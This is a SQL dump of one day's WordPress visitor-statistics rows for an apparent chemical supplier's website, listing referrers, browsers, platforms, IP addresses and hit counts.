INSERT INTO `wp_statistics_visitor` VALUES (12171, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.94.191.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12172, '2016-10-26', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '49.49.237.209', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12173, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.133.162.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12174, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.144.184.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12175, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.137.217.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12176, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '199.167.119.1', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12177, '2016-10-26', 'https://www.adsensecustomsearchads.com/afs/ads?q=high%20temp%20epoxy&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000108&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-276%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=4&format=n6&ad=n6&nocache=4621477490020020&num=0&output=uds_ads_only&v=3&bsl=10&u_his=2&u_tz=-240&dt=1477490020021&u_w=1524&u_h=857&biw=-12245933&bih=-12245933&isw=1280&ish=1&psw=1280&psh=0&frm=2&uio=uv3-&jsv=58687&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com&optref=https%3A%2F%2F45944a0081ec12e0081efcb4212702f0a29dab5c84b5ff0b283db4543f97118b%2F87ab0c497007245ea7f8a24fba965cde9d98a6e4af189f7bf38e1f7ff283e783', 'Edge', 'Windows', '14.14393', '', '174.104.102.252', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12178, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.26.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12179, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.230.154.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12180, '2016-10-26', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjiscmG0fjPAhVGVxQKHRI9D9UQjBAIJTAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.136593572,d.bGs', 'MSIE', 'Windows', '11.0', '', '193.24.32.44', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12181, '2016-10-26', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwiv5KaO0fjPAhVCD8AKHXdLDEIQFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw&sig2=7heC67N8UY5Rko--hPwawA', 'MSIE', 'Windows', '11.0', '', '57.98.31.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12182, '2016-10-26', 'https://www.miller-stephenson.com/product/vazo-67-radical-initiator/', 'MSIE', 'Windows', '11.0', '', '57.98.31.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12183, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.27.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12184, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.70.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12185, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwj4rK3Y0fjPAhXJ7iYKHd02D7IQFggvMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2F&usg=AFQjCNFQwRFTtPon2Qqwmei8CXX9dl913g&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '10.36.15.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12186, '2016-10-26', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '88.248.53.223', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12187, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.24.9', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12188, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12189, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.224.224.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12190, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12191, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.124.152.10', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12192, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12193, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12194, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '108.170.81.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12195, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.193.238.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12196, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.158.211.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12197, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '162.226.158.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12198, '2016-10-26', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '206.75.249.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12199, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.234.122.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12200, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '97.87.217.146', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12201, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '74.143.231.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12202, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.47.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12203, '2016-10-26', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.223.116.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12204, '2016-10-26', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '45.0', '', '134.223.116.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12205, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.97.164.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12206, '2016-10-26', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '62.84.152.98', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12207, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '69.18.37.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12208, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.36.224.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12209, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.45.193.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12210, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '75.129.140.91', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12211, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.149.19.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12212, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12213, '2016-10-26', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.137.14.79', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12214, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.128.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12215, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.155.218.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12216, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '169.240.84.223', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12217, '2016-10-26', 'https://www.bing.com/search?q=miller-stephenson+sds&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '132.3.57.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12218, '2016-10-26', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12219, '2016-10-26', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12220, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiY5cP33_jPAhXSg34KHdneDY0YABAA&ei=5cYQWIvSKYn0jwPh36PQDA&sig=AOD64_0ngmg99hLTHXsQyfIvzX1TWdSO9A&rct=j&q=&sqi=2&ved=0ahUKEwjL2Lj33_jPAhUJ-mMKHeHvCMoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '205.251.178.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12221, '2016-10-26', 'https://www.miller-stephenson.com/tech-support/sds/', 'MSIE', 'Windows', '11.0', '', '132.3.57.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12222, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12223, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '166.131.39.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12224, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.234.93.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12225, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.104.127.188', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12226, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.184.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12227, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12228, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12229, '2016-10-26', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '50.151.36.144', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12230, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12231, '2016-10-26', 'https://www.miller-stephenson.com', 'HubSpot', 'Unknown', 'Unknown', '', '54.174.59.233', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12232, '2016-10-26', 'https://vavilone.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12233, '2016-10-26', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.147.17.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12234, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.246.91.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12235, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.229.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12236, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjDpJmL5PjPAhVNCbwKHatBCiAYABAB&sig=AOD64_2bu4WCatozBzKuX2CrNP1qCusQaA&rct=j&q=&ved=0ahUKEwi-uZWL5PjPAhWIgLwKHcPxDYUQ0QwIIg&adurl=', 'MSIE', 'Windows', '11.0', '', '184.188.182.74', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12237, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.44.173.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12238, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.75', '', '96.3.200.22', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12239, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12240, '2016-10-26', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '173.13.100.13', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12241, '2016-10-26', 'https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/', 'MSIE', 'Windows', '9.0', '', '204.79.180.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12242, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.112.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12243, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.25.199.53', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12244, '2016-10-26', 'https://www.miller-stephenson.com/chemicals/solvents/', 'MSIE', 'Windows', '11.0', '', '140.180.246.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12245, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '197.210.25.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12246, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '140.198.52.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12247, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiq2_On6PjPAhXEaz4KHRmcBk0QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2Fms-111%2F&usg=AFQjCNFlrDBr25m2BSHsWy5EsbQBrH9taA&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '47.23.20.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12248, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '23.228.172.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12249, '2016-10-26', 'https://50.62.30.35/phpmyadmin', 'MSIE', 'Windows', '9.0', '', '118.178.228.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12250, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi2wLTm6vjPAhVRX34KHUx3AuMYABAA&sig=AOD64_1x043_6PTu4ToPDpAda8ps8XV7qw&rct=j&q=&ved=0ahUKEwid0rHm6vjPAhUM9WMKHdb0BegQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '152.121.19.254', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12251, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '148.76.3.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12252, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '54.0.2840.71', '', '91.4.220.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12253, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '23.30.142.93', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12254, '2016-10-26', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12255, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12256, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.240.162.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12257, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.132.125.34', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12258, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.243.182.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12259, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.230.228.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12260, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.50.22.252', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12261, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '108.62.46.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12262, '2016-10-26', 'https://www.google.com', 'Firefox', 'Macintosh', '45.0', '', '96.243.34.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12263, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.153.130.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12264, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.100.91.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12265, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.90.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12266, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '128.84.47.144', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12267, '2016-10-26', 'https://www.bing.com/search?q=Epon+862&qs=n&pq=epon+862&sc=8-8&sp=-1&sk=&cvid=40548DAAAB694AEC9BAADE05605E3FEE&first=11&FORM=PORE', 'MSIE', 'Windows', '11.0', '', '38.96.42.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12268, '2016-10-26', 'https://www.google.so/search?q=uses+of+polymerisarion&client=ms-samsung&gl=so&hl=so-SO&ie=UTF-8&prmd=ivns&ei=BuIQWP_cI8LjU5vnmbAF&start=20&sa=N', 'Chrome', 'Android', '38.0.1025.166', '', '197.157.245.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12269, '2016-10-26', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjG_7GF-vjPAhXDl34KHRNKBXgYABAD&sig=AOD64_3iLft-JvsB2ye-QcVFmr_tTWqmow&ctype=4&rct=j&q=&ved=0ahUKEwjv86yF-vjPAhVPImMKHduKCDEQwgUIIigC&adurl=', 'MSIE', 'Windows', '11.0', '', '207.188.87.53', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12270, '2016-10-26', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.75.238.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12271, '2016-10-26', 'https://www.miller-stephenson.com', 'BlackBerry Browser', 'BlackBerry', '10.3.2.2639', '', '207.228.78.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12272, '2016-10-26', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.45.15.97', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12273, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '80.12.37.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12274, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.195.137.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12275, '2016-10-26', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '128.233.6.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12276, '2016-10-26', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj3yYvJ_PjPAhVJ0GMKHYeoBP0QFggnMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNHUfibmnSo5DfkuTd-5Mx9sov-a1Q&bvm=bv.136593572,d.cGc', 'MSIE', 'Windows', '11.0', '', '184.69.10.114', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12277, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12278, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12279, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.53.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12280, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2406:5600:66:8893:44af:5a8c:dbbe:c754', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12281, '2016-10-26', 'https://search.yahoo.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.176.217.127', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12282, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12283, '2016-10-26', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12284, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.204.110.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12285, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.30.178.203', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12286, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.222.212.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12287, '2016-10-26', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=6&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '54.0.2840.71', '', '173.13.227.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12288, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.68.26.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12289, '2016-10-26', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '158.106.89.16', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12290, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.251.123.42', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12291, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12292, '2016-10-26', 'https://www.miller-stephenson.com/product/vazo-64-radical-initiator/', 'MSIE', 'Windows', '9.0', '', '204.79.180.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12293, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.109.181.40', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12294, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.91.115.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12295, '2016-10-26', 'https://r.search.yahoo.com/_ylt=A0LEViwD7hBYLrEAk2knnIlQ;_ylu=X3oDMTEyNnJkMjI2BGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjI1ODBfMQRzZWMDc3I-/RV=2/RE=1477533316/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fplastic-glass-metal-cleaner%2f/RK=0/RS=.uRDJ2KX4z_KAPTgFpcMTjheyic-', 'Firefox', 'Windows', '45.0', '', '128.84.45.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12296, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.161.201.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12297, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '191.6.194.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12298, '2016-10-26', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12299, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.234.109.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12300, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.187.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12301, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '174.127.112.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12302, '2016-10-26', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.76.252.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12303, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.75.180.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12304, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.254.97.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12305, '2016-10-26', 'https://www.google.az/', 'Chrome', 'Windows', '54.0.2840.71', '', '78.109.51.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12306, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
